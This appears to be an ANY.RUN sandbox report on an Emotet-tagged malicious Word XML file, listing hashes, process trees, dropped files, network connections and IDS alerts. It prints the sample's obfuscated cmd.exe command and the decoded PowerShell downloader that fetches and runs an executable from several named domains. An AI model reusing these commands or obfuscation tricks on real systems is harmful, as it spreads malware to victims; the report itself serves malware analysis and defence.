File name: asdfasdf.doc

Full analysis: https://app.any.run/tasks/420714c3-8fcf-4b33-a834-e3898fefd3bd
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 23, 2019, 10:08:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: loader, emotet-doc, emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5: C8A65DCF63D22A1798385E7A9908A17B
SHA1: 224807E7D5A89718EAC50CF7D6A390A936118CB8
SHA256: A6E5D329FDA48244000EF4AC47A2872DEEA0A005D662279934ED1B5430E1A33A
SSDEEP: 3072:Mbw+aINTjL/xSu90OoiLuDKZXfwKeljR1z:MWIN7xUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3048)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3048)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2752)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2376)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1328)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2376)
    • Application was dropped or rewritten from another process

      • 784.exe (PID: 3480)
      • 784.exe (PID: 2600)
      • wabmetagen.exe (PID: 3976)
      • wabmetagen.exe (PID: 2572)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3376)
    • Application launched itself

      • cmd.exe (PID: 3072)
      • cmd.exe (PID: 2752)
      • 784.exe (PID: 3480)
      • wabmetagen.exe (PID: 3976)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3072)
      • cmd.exe (PID: 2752)
      • cmd.exe (PID: 2452)
      • cmd.exe (PID: 3204)
    • Creates files in the user directory

      • powershell.exe (PID: 2376)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2376)
      • 784.exe (PID: 2600)
    • Starts itself from another location

      • 784.exe (PID: 2600)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3048)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3048)
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 00F74043
WordDocumentBodySectPRsidRDefault: 00D718DB
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: (base64-encoded binary data)
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:01:23 06:29:00Z
WordDocumentDocumentPropertiesCreated: 2019:01:23 06:29:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
Total processes: 45
Monitored processes: 15
Malicious processes: 6
Suspicious processes: 3

Behavior graph

Processes in the graph, in order: msoxmled.exe (no specs), winword.exe (no specs), cmd.exe (no specs) ×6, findstr.exe (no specs), cmd.exe (no specs), powershell.exe, 784.exe (no specs), 784.exe, wabmetagen.exe (no specs), wabmetagen.exe

Process information

PID | CMD | Path | Indicators | Parent process
3376 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\asdfasdf.doc.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | | explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: XML Editor
Exit code: 0
Version: 14.0.4750.1000
PID: 3048
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\asdfasdf.doc.xml"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: MSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2452c:\m4308\n1983\c4441\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set wJ=Ic$Fy%H72nT)x-4f:G D(CbM5igoUdjv;VLhW18}Km'w=r\.S06Np@9E/salOAPBu{,t~k+e3&&for %J in (52;27;43;5;62;28;63;34;0;21;16;68;24;66;37;5;45;5;48;55;48;48;0;60;51;51;61;23;55;16;68;13;14;66;37;5;35;5;10;55;23;62;16;68;13;72;66;37;5;59;59;18;2;29;7;24;38;37;44;42;22;37;72;7;14;42;32;2;52;38;24;54;38;44;9;71;43;13;27;22;30;71;1;67;18;51;71;67;47;36;71;22;21;59;25;71;9;67;32;2;64;38;49;54;38;44;42;35;67;67;52;16;56;56;71;45;29;71;41;22;64;59;64;67;47;1;27;41;56;67;45;55;33;19;58;17;53;35;67;67;52;16;56;56;22;58;25;30;25;9;15;71;9;47;1;27;41;56;50;23;71;8;59;10;6;48;45;43;53;35;67;67;52;16;56;56;15;58;67;41;58;9;64;45;67;58;57;69;71;57;71;9;47;1;27;41;56;49;19;24;40;63;15;14;17;69;53;35;67;67;52;16;56;56;52;58;69;57;27;4;41;64;35;71;9;29;25;57;59;25;69;47;1;27;41;56;52;29;29;48;19;57;63;57;3;53;35;67;67;52;16;56;56;22;27;27;67;58;59;4;47;1;27;41;56;3;71;12;24;67;7;15;71;42;47;48;52;59;25;67;20;42;53;42;11;32;2;58;14;50;14;54;44;42;9;72;8;8;24;42;32;2;45;7;72;8;8;18;44;18;42;7;38;14;42;32;2;43;37;50;37;44;42;64;72;8;50;37;42;32;2;69;14;72;37;50;44;2;71;9;31;16;67;71;41;52;70;42;46;42;70;2;45;7;72;8;8;70;42;47;71;12;71;42;32;15;27;45;71;58;1;35;20;2;64;37;50;37;50;18;25;9;18;2;64;38;49;54;38;11;65;67;45;4;65;2;52;38;24;54;38;47;19;27;43;9;59;27;58;29;3;25;59;71;20;2;64;37;50;37;50;66;18;2;69;14;72;37;50;11;32;2;31;8;8;38;49;44;42;31;54;50;7;7;42;32;0;15;18;20;20;17;71;67;13;0;67;71;41;18;2;69;14;72;37;50;11;47;59;71;9;26;67;35;18;13;26;71;18;14;49;49;49;49;11;18;65;0;9;31;27;69;71;13;0;67;71;41;18;2;69;14;72;37;50;32;2;27;54;50;14;49;44;42;27;24;7;49;54;42;32;22;45;71;58;69;32;39;39;1;58;67;1;35;65;39;39;2;52;7;72;72;54;44;42;35;24;7;54;38;42;32;81)do set Oe=!Oe!!wJ:~%J,1!&&if %J==81 echo !Oe:*Oe!=!|FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^^^|findstr cm')DO %B "c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3072CmD /V:ON/C"set wJ=Ic$Fy%H72nT)x-4f:G D(CbM5igoUdjv;VLhW18}Km'w=r\.S06Np@9E/salOAPBu{,t~k+e3&&for %J in (52;27;43;5;62;28;63;34;0;21;16;68;24;66;37;5;45;5;48;55;48;48;0;60;51;51;61;23;55;16;68;13;14;66;37;5;35;5;10;55;23;62;16;68;13;72;66;37;5;59;59;18;2;29;7;24;38;37;44;42;22;37;72;7;14;42;32;2;52;38;24;54;38;44;9;71;43;13;27;22;30;71;1;67;18;51;71;67;47;36;71;22;21;59;25;71;9;67;32;2;64;38;49;54;38;44;42;35;67;67;52;16;56;56;71;45;29;71;41;22;64;59;64;67;47;1;27;41;56;67;45;55;33;19;58;17;53;35;67;67;52;16;56;56;22;58;25;30;25;9;15;71;9;47;1;27;41;56;50;23;71;8;59;10;6;48;45;43;53;35;67;67;52;16;56;56;15;58;67;41;58;9;64;45;67;58;57;69;71;57;71;9;47;1;27;41;56;49;19;24;40;63;15;14;17;69;53;35;67;67;52;16;56;56;52;58;69;57;27;4;41;64;35;71;9;29;25;57;59;25;69;47;1;27;41;56;52;29;29;48;19;57;63;57;3;53;35;67;67;52;16;56;56;22;27;27;67;58;59;4;47;1;27;41;56;3;71;12;24;67;7;15;71;42;47;48;52;59;25;67;20;42;53;42;11;32;2;58;14;50;14;54;44;42;9;72;8;8;24;42;32;2;45;7;72;8;8;18;44;18;42;7;38;14;42;32;2;43;37;50;37;44;42;64;72;8;50;37;42;32;2;69;14;72;37;50;44;2;71;9;31;16;67;71;41;52;70;42;46;42;70;2;45;7;72;8;8;70;42;47;71;12;71;42;32;15;27;45;71;58;1;35;20;2;64;37;50;37;50;18;25;9;18;2;64;38;49;54;38;11;65;67;45;4;65;2;52;38;24;54;38;47;19;27;43;9;59;27;58;29;3;25;59;71;20;2;64;37;50;37;50;66;18;2;69;14;72;37;50;11;32;2;31;8;8;38;49;44;42;31;54;50;7;7;42;32;0;15;18;20;20;17;71;67;13;0;67;71;41;18;2;69;14;72;37;50;11;47;59;71;9;26;67;35;18;13;26;71;18;14;49;49;49;49;11;18;65;0;9;31;27;69;71;13;0;67;71;41;18;2;69;14;72;37;50;32;2;27;54;50;14;49;44;42;27;24;7;49;54;42;32;22;45;71;58;69;32;39;39;1;58;67;1;35;65;39;39;2;52;7;72;72;54;44;42;35;24;7;54;38;42;32;81)do set Oe=!Oe!!wJ:~%J,1!&&if %J==81 echo !Oe:*Oe!=!|FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^^^|findstr cm')DO %B "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 2672
CMD: C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $d7581='b1374';$p8598=new-object Net.WebClient;$u8098='http://erdembulut.com/trEVDaG@http://baijinfen.com/6Me2lTHSrw@http://fatmanurtaskesen.com/0D5KBf4Gk@http://paksoymuhendislik.com/pddSDsBsF@http://bootaly.com/Fex5t7fe'.Split('@');$a4649='n3225';$r7322 = '784';$w161='u3261';$k4316=$env:temp+'\'+$r7322+'.exe';foreach($u1616 in $u8098){try{$p8598.DownloadFile($u1616, $k4316);$v2280='v9677';If ((Get-Item $k4316).length -ge 40000) {Invoke-Item $k4316;$o9640='o5709';break;}}catch{}}$p7339='h5798';"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 2752
CMD: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^|findstr cm') DO %B "
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 3204
CMD: C:\Windows\system32\cmd.exe /c ftype|findstr cm
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 3452
CMD: C:\Windows\system32\cmd.exe /S /D /c" ftype"
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 3544
CMD: findstr cm
Path: C:\Windows\system32\findstr.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (QGREP) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
PID: 1328
CMD: cmd
Path: C:\Windows\system32\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 186
Read events
1 704
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
PID: 3048
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVR8E4C.tmp.cvr
MD5:
SHA256:
PID: 3048
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\679C23D1.jpg
MD5:
SHA256:
PID: 2376
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HZCME5TZ477JR7VW95SX.temp
MD5:
SHA256:
PID: 2376
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a53f.TMP
Type: binary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
PID: 3048
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~$dfasdf.doc.xml
Type: pgc
MD5:B3EC9598EB969B75F73E0F907E4E958C
SHA256:E28E34ADC25161750D91762A959E3B2480D37CDF4DE7F110461AC48E08277B04
PID: 2376
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
PID: 3048
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5:A45EB704483E0EB1916FB65832D39E0D
SHA256:525B8EF4563638DDE742038C1CF6F23D020B7E7FB834DD8F4EE8E2464F18740D
PID: 2376
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\784.exe
Type: executable
MD5:E3A822335FF17167EF126A8858F02457
SHA256:9F3F5857DE6D5E51DDFAD6E1BBD23E885D8B570DCDFBFFD8544C5EB02ACCFDD5
PID: 2600
Process: 784.exe
Filename: C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
Type: executable
MD5:E3A822335FF17167EF126A8858F02457
SHA256:9F3F5857DE6D5E51DDFAD6E1BBD23E885D8B570DCDFBFFD8544C5EB02ACCFDD5
PID: 3048
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
Type: tlb
MD5:655BC0B5E4ED3702A4AF6B1E0E5666CA
SHA256:DDFD001D5C9E36C32E770F3D64BCC7EAD1AE66CFBD0055052907A1A2ACB27D45
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2376
powershell.exe
GET
200
94.73.146.97:80
http://erdembulut.com/trEVDaG/
TR
executable
192 Kb
malicious
2376
powershell.exe
GET
301
94.73.146.97:80
http://erdembulut.com/trEVDaG
TR
html
1.12 Kb
malicious
2572
wabmetagen.exe
GET
200.125.113.60:8080
http://200.125.113.60:8080/
AR
malicious

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2572
wabmetagen.exe
200.125.113.60:8080
Telecentro S.A.
AR
malicious
2376
powershell.exe
94.73.146.97:80
erdembulut.com
Cizgi Telekomunikasyon Anonim Sirketi
TR
malicious

DNS requests

Domain
IP
Reputation
erdembulut.com
  • 94.73.146.97
malicious

Threats

PID
Process
Class
Message
2376
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2376
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2376
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2376
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2376
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info